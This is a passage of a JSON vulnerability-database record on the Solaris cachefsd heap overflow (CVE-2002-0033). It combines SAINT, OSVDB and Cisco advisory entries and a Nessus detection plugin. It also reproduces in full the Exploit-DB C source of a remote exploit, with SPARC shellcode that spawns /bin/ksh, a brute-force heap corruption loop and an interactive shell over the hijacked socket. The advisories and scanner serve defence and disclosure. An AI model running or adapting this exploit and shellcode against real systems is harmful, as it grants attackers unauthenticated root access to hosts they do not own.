References\n\n<http://www.cert.org/advisories/CA-2002-11.html> \n\n\n### Platforms\n\nSunOS 5.6 / Solaris 2.6 \nSunOS 5.7 / Solaris 7 \n \n\n", "modified": "2006-04-05T00:00:00", "published": "2006-04-05T00:00:00", "id": "SAINT:3AEC527DDF0F8FD500158F5102FDDEE0", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/solaris_cachefsd", "type": "saint", "title": "cachefsd heap overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "description": "Added: 04/05/2006 \nCVE: [CVE-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0033>) \nBID: [4674](<http://www.securityfocus.com/bid/4674>) \nOSVDB: [779](<http://www.osvdb.org/779>) \n\n\n### Background\n\n`**cachefsd**` is an RPC service which supports local caching of Network File Systems (NFS), thereby improving performance on filesystems mounted from an NFS server. \n\n### Problem\n\nA heap overflow in `**cachefsd**` allows remote command execution. \n\n### Resolution\n\nApply the patch or workaround referenced in [Sun Alert 44309](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-44309-1>). \n\n### References\n\n<http://www.cert.org/advisories/CA-2002-11.html> \n\n\n### Platforms\n\nSunOS 5.6 / Solaris 2.6 \nSunOS 5.7 / Solaris 7 \n \n\n", "modified": "2006-04-05T00:00:00", "published": "2006-04-05T00:00:00", "id": "SAINT:8FE2C21CB99188D66319904930E9E2EF", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/solaris_cachefsd", "title": "cachefsd heap overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 17477](https://vulners.com/osvdb/OSVDB:17477)\n[CVE-2002-0033](https://vulners.com/cve/CVE-2002-0033)\n", "modified": "2002-05-05T00:00:00", "published": "2002-05-05T00:00:00", "id": "OSVDB:779", "href": "https://vulners.com/osvdb/OSVDB:779", "title": "Solaris RPC cachefsd cfsd_calloc Function Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T16:28:10", "bulletinFamily": "exploit", "description": "Solaris 2/7/8/9 cachefsd Heap Overflow Vulnerability. CVE-2002-0033. Remote exploit for solaris platform", "modified": "2002-01-01T00:00:00", "published": "2002-01-01T00:00:00", "id": "EDB-ID:21437", "href": "https://www.exploit-db.com/exploits/21437/", "type": "exploitdb", "title": "Solaris 2/7/8/9 cachefsd Heap Overflow Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/4674/info\r\n\r\nA remotely exploitable buffer overflow condition has been reported in cachefsd. The overflow occurs in the heap and is reportedly exploitable as valid malloc() chunk structures are overwritten. Successful attacks may result in remote attackers gaining root access on the affected system. \r\n\r\n/*## copyright LAST STAGE OF DELIRIUM jan 2002 poland *://lsd-pl.net/ #*/\r\n/*## cachefsd #*/\r\n\r\n/* this code was tested on sun4u and sun4m architecture for Solaris 6/7. */\r\n/* due to large data transfers of about 100KB and the use of some brute */\r\n/* force technique the code may need some time to proceed. */\r\n/* for older sparc architectures try using the -m option. */\r\n/* in case the exploit fails after passing all cycles of the brute force loop */\r\n/* try to use the -b option. */\r\n\r\n\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/time.h>\r\n#include <netinet/in.h>\r\n#include <rpc/rpc.h>\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <errno.h>\r\n\r\n#define CACHEFS_PROG 100235\r\n#define CACHEFS_VERS 1\r\n#define CACHEFS_MOUNTED 5\r\n\r\n#define NOPNUM 60\r\n\r\nchar shellcode[]=\r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode-4> */\r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <shellcode> */\r\n \"\\x7f\\xff\\xff\\xff\" /* call <shellcode+4> */\r\n \"\\x90\\x03\\xe0\\x20\" /* add %o7,32,%o0 */\r\n \"\\x92\\x02\\x20\\x10\" /* add %o0,16,%o1 */\r\n \"\\xc0\\x22\\x20\\x08\" /* st %g0,[%o0+8] */\r\n \"\\xd0\\x22\\x20\\x10\" /* st %o0,[%o0+16] */\r\n \"\\xc0\\x22\\x20\\x14\" /* st %g0,[%o0+20] */\r\n \"\\x82\\x10\\x20\\x0b\" /* mov 0x0b,%g1 */\r\n \"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n \"/bin/ksh\"\r\n;\r\n\r\nchar findsckcode[]=\r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <findsckcode-4> */\r\n \"\\x20\\xbf\\xff\\xff\" /* bn,a <findsckcode> */\r\n \"\\x7f\\xff\\xff\\xff\" /* call <findsckcode+4> */\r\n \"\\x33\\x02\\x12\\x34\"\r\n \"\\xa0\\x10\\x20\\xff\" /* mov 0xff,%l0 */\r\n \"\\xa2\\x10\\x20\\x54\" /* mov 0x54,%l1 */\r\n \"\\xa4\\x03\\xff\\xd0\" /* add %o7,-48,%l2 */\r\n \"\\xaa\\x03\\xe0\\x28\" /* add %o7,40,%l5 */\r\n \"\\x81\\xc5\\x60\\x08\" /* jmp %l5+8 */\r\n \"\\xc0\\x2b\\xe0\\x04\" /* stb %g0,[%o7+4] */\r\n \"\\xe6\\x03\\xff\\xd0\" /* ld [%o7-48],%l3 */\r\n \"\\xe8\\x03\\xe0\\x04\" /* ld [%o7+4],%l4 */\r\n \"\\xa8\\xa4\\xc0\\x14\" /* subcc %l3,%l4,%l4 */\r\n \"\\x02\\xbf\\xff\\xfb\" /* bz <findsckcode+32> */\r\n \"\\xaa\\x03\\xe0\\x5c\" /* add %o7,92,%l5 */\r\n \"\\xe2\\x23\\xff\\xc4\" /* st %l1,[%o7-60] */\r\n \"\\xe2\\x23\\xff\\xc8\" /* st %l1,[%o7-56] */\r\n \"\\xe4\\x23\\xff\\xcc\" /* st %l2,[%o7-52] */\r\n \"\\x90\\x04\\x20\\x01\" /* add %l0,1,%o0 */\r\n \"\\xa7\\x2c\\x60\\x08\" /* sll %l1,8,%l3 */\r\n \"\\x92\\x14\\xe0\\x91\" /* or %l3,0x91,%o1 */\r\n \"\\x94\\x03\\xff\\xc4\" /* add %o7,-60,%o2 */\r\n \"\\x82\\x10\\x20\\x36\" /* mov 0x36,%g1 */\r\n \"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n \"\\x1a\\xbf\\xff\\xf1\" /* bcc <findsckcode+36> */\r\n \"\\xa0\\xa4\\x20\\x01\" /* deccc %l0 */\r\n \"\\x12\\xbf\\xff\\xf5\" /* bne <findsckcode+60> */\r\n \"\\xa6\\x10\\x20\\x03\" /* mov 0x03,%l3 */\r\n \"\\x90\\x04\\x20\\x02\" /* add %l0,2,%o0 */\r\n \"\\x92\\x10\\x20\\x09\" /* mov 0x09,%o1 */\r\n \"\\x94\\x04\\xff\\xff\" /* add %l3,-1,%o2 */\r\n \"\\x82\\x10\\x20\\x3e\" /* mov 0x3e,%g1 */\r\n \"\\xa6\\x84\\xff\\xff\" /* addcc %l3,-1,%l3 */\r\n \"\\x12\\xbf\\xff\\xfb\" /* bne <findsckcode+112> */\r\n \"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n;\r\n\r\nstatic char nop[]=\"\\x80\\x1c\\x40\\x11\";\r\n\r\ntypedef struct{char *dir;char *cache;}req_t;\r\n\r\nbool_t xdr_req(XDR *xdrs,req_t *objp){\r\n if(!xdr_string(xdrs,&objp->dir,~0)) return(FALSE);\r\n if(!xdr_string(xdrs,&objp->cache,~0)) return(FALSE);\r\n return(TRUE);\r\n}\r\n\r\nint tab[]={\r\n 0x11111111,0x11111111,0xffffffff,0x00000000,\r\n 0xffffffff,0xffffffff,0xffffffff,0xffffffff,\r\n 0xffffffff,0x00000000,0x22222222,0x22222222\r\n};\r\n\r\nmain(int argc,char **argv){\r\n char buffer[100000],*b;\r\n int i,j,c,n,address,offset=0,ofs=0,port=0,sck,flag=0,mflag=0,vers=-1;\r\n CLIENT *cl;enum clnt_stat stat;\r\n struct hostent *hp;\r\n struct sockaddr_in adr;\r\n struct timeval tm={10,0};\r\n req_t req;\r\n\r\n printf(\"copyright LAST STAGE OF DELIRIUM jan 2002 poland //lsd-pl.net/\\n\");\r\n printf(\"cachefsd for solaris 2.6 2.7 sparc\\n\\n\");\r\n\r\n if(argc<2){\r\n printf(\"usage: %s address [-p port] [-o ofs] -v 6|7 [-b] [-m]\\n\",argv[0]);\r\n exit(-1);\r\n }\r\n\r\n while((c=getopt(argc-1,&argv[1],\"p:o:v:bm\"))!=-1){\r\n switch(c){\r\n case 'p': port=atoi(optarg);break;\r\n case 'o': offset=atoi(optarg);break;\r\n case 'v': vers=atoi(optarg);break;\r\n case 'b': flag=1;break;\r\n\tcase 'm': mflag=1;\r\n }\r\n }\r\n\r\n switch(vers){\r\n case 6: address=0xefffeb20;break;\r\n case 7: case 8: address=0xffbee998;break;\r\n default: exit(-1);\r\n }\r\n if(mflag) address=0xeffffa1c;\r\n for(j=0;j<512;j++){\r\n tab[0]=tab[1]=htonl(0xfffffffe);\r\n tab[3]=htonl(address+offset+ofs+((flag)?80:0));\r\n tab[9]=htonl(address+offset+ofs+((mflag)?-4136:4228));\r\n\r\n if(!j){\r\n printf(\"ret=0x%08x adr=0x%08x ofs=%d timeout=%d\\n\",\r\n\t ntohl(tab[9]),ntohl(tab[3]),offset,\r\n\t tm.tv_sec);\r\n }\r\n\r\n adr.sin_family=AF_INET;\r\n adr.sin_port=htons(port);\r\n if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){\r\n if((hp=gethostbyname(argv[1]))==NULL){\r\n\t errno=EADDRNOTAVAIL;perror(\"\\nerror\");exit(-1);\r\n }\r\n memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);\r\n }\r\n \r\n sck=RPC_ANYSOCK;\r\n if(!(cl=clnttcp_create(&adr,CACHEFS_PROG,CACHEFS_VERS,&sck,0,0))){\r\n clnt_pcreateerror(\"\\nclnttcp_create error\");exit(-1);\r\n }\r\n cl->cl_auth=authunix_create(\"localhost\",0,0,0,NULL);\r\n\r\n memset(buffer,0xff,60000);\r\n buffer[60000]=0;\r\n\r\n req.dir=buffer;\r\n req.cache=\"lsd\";\r\n\r\n stat=clnt_call(cl,CACHEFS_MOUNTED,xdr_req,(void*)&req,xdr_void,NULL,tm);\r\n if(stat!=RPC_SUCCESS) {clnt_perror(cl,\"\\nerror\");exit(-1);}\r\n\r\n i=sizeof(struct sockaddr_in);\r\n if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){\r\n struct{unsigned int maxlen;unsigned int len;char *buf;}nb;\r\n ioctl(sck,(('S'<<8)|2),\"sockmod\");\r\n nb.maxlen=0xffff;\r\n nb.len=sizeof(struct sockaddr_in);\r\n nb.buf=(char*)&adr;\r\n ioctl(sck,(('T'<<8)|144),&nb);\r\n }\r\n n=ntohs(adr.sin_port);\r\n\r\n findsckcode[14+0]=(unsigned char)((n>>8)&0xff);\r\n findsckcode[14+1]=(unsigned char)(n&0xff);\r\n\r\n memset(buffer,0x41,14000);\r\n b=buffer; \r\n for(i=0;i<NOPNUM;i++) *b++=nop[i%4];\r\n for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];\r\n for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];\r\n memcpy(&buffer[13920],tab,40);\r\n buffer[14000]=0;\r\n\r\n req.dir=\"/var/lp\";\r\n req.cache=buffer;\r\n stat=clnt_call(cl,CACHEFS_MOUNTED,xdr_req,(void*)&req,xdr_void,NULL,tm);\r\n if(stat!=RPC_SUCCESS) {clnt_perror(cl,\"\\nerror\");exit(-1);}\r\n stat=clnt_call(cl,CACHEFS_MOUNTED,xdr_req,(void*)&req,xdr_void,NULL,tm);\r\n if((stat==RPC_SUCCESS)||(stat==RPC_CANTRECV)){\r\n clnt_destroy(cl);close(sck);\r\n ofs=(j%2)?(-((j>>1)+1)*4):(((j>>1)+1)*4);\r\n\t printf(\".\");fflush(stdout);\r\n }else break;\r\n }\r\n\r\n printf(\"OK! adr=0x%08x\\n\",ntohl(tab[3]));\r\n write(sck,\"/bin/uname -a\\n\",14);\r\n while(1){\r\n fd_set fds;\r\n FD_ZERO(&fds);\r\n FD_SET(0,&fds);\r\n FD_SET(sck,&fds);\r\n if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){\r\n\t int cnt;\r\n\t char buf[1024];\r\n\t if(FD_ISSET(0,&fds)){\r\n if((cnt=read(0,buf,1024))<1){\r\n\t if(errno==EWOULDBLOCK||errno==EAGAIN) continue;\r\n\t else break;\r\n }\r\n\t write(sck,buf,cnt);\r\n }\r\n if(FD_ISSET(sck,&fds)){\r\n if((cnt=read(sck,buf,1024))<1){\r\n\t if(errno==EWOULDBLOCK||errno==EAGAIN) continue;\r\n\t else break;\r\n }\r\n write(1,buf,cnt);\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21437/"}], "nessus": [{"lastseen": "2019-11-01T02:15:02", "bulletinFamily": "scanner", "description": "The cachefsd RPC service is running on the remote host. It is,\ntherefore, potentially affected by the following vulnerabilities :\n\n - A heap-based buffer overflow condition exists in the\n cfsd_calloc() function that allows an unauthenticated,\n remote attacker to execute arbitrary code via a long\n directory and cache name. (CVE-2002-0033 / ESCROWUPGRADE)\n\n - A heap-based buffer overflow condition exists in the\n fscache_setup() function that allows a local attacker\n to gain root privileges via a long mount argument.\n (CVE-2002-0084)\n\nESCROWUPGRADE is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/08 by a group known as the Shadow\nBrokers.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead only detected that the service is running.", "modified": "2019-11-02T00:00:00", "id": "CACHEFSD_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/10951", "published": "2002-05-08T00:00:00", "title": "Solaris cachefsd Multiple Vulnerabilities (ESCROWUPGRADE)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10951);\n script_version(\"1.36\");\n script_cvs_date(\"Date: 2018/06/29 12:01:00\");\n\n script_cve_id(\"CVE-2002-0033\", \"CVE-2002-0084\");\n script_bugtraq_id(4631, 4674);\n script_xref(name:\"CERT\", value:\"161931\");\n script_xref(name:\"CERT\", value:\"635811\");\n script_xref(name:\"CERT-CC\", value:\"CA-2002-11\");\n script_xref(name:\"EDB-ID\", value:\"21437\");\n\n script_name(english:\"Solaris cachefsd Multiple Vulnerabilities (ESCROWUPGRADE)\");\n script_summary(english:\"Checks the presence of an RPC service.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote RPC service is potentially affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The cachefsd RPC service is running on the remote host. It is,\ntherefore, potentially affected by the following vulnerabilities :\n\n - A heap-based buffer overflow condition exists in the\n cfsd_calloc() function that allows an unauthenticated,\n remote attacker to execute arbitrary code via a long\n directory and cache name. (CVE-2002-0033 / ESCROWUPGRADE)\n\n - A heap-based buffer overflow condition exists in the\n fscache_setup() function that allows a local attacker\n to gain root privileges via a long mount argument.\n (CVE-2002-0084)\n\nESCROWUPGRADE is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/08 by a group known as the Shadow\nBrokers.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead only detected that the service is running.\");\n # https://web.archive.org/web/20020616080638/http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0048.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?082477b0\");\n script_set_attribute(attribute:\"see_also\", value:\"http://download.oracle.com/sunalerts/1000988.1.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch referenced in the vendor's advisory.\n\nAlternatively, disable cachefsd by commenting out cachefsd in\n/etc/inetd.conf and then killing the process.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/05/08\");\n\nscript_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n script_copyright(english:\"This script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_dependencies(\"rpc_portmap.nasl\");\n script_require_keys(\"rpc/portmap\", \"Settings/ParanoidReport\", \"Host/OS\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"sunrpc_func.inc\");\ninclude(\"audit.inc\");\n\nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Solaris\" >!< os) audit(AUDIT_OS_NOT, \"Solaris\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n#\n# This is kinda lame but there's no way (yet) to remotely determine if\n# this service is vulnerable to this flaw.\n#\nRPC_PROG = 100235;\ntcp = 0;\nport = get_rpc_port2(program:RPC_PROG, protocol:IPPROTO_UDP);\nif(!port){\n port = get_rpc_port2(program:RPC_PROG, protocol:IPPROTO_TCP);\n tcp = 1;\n }\n\nif(port)\n{\n if(tcp)security_hole(port);\n else security_hole(port:port, protocol:\"udp\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2019-05-29T15:33:26", "bulletinFamily": "software", "description": "", "modified": "2002-07-24T16:00:00", "published": "2002-07-24T16:00:00", "id": "CISCO-SA-20020724-SOLARIS-CACHEFS", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20020724-solaris-cachefs", "type": "cisco", "title": "Heap Overflow in Solaris cachefs Daemon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
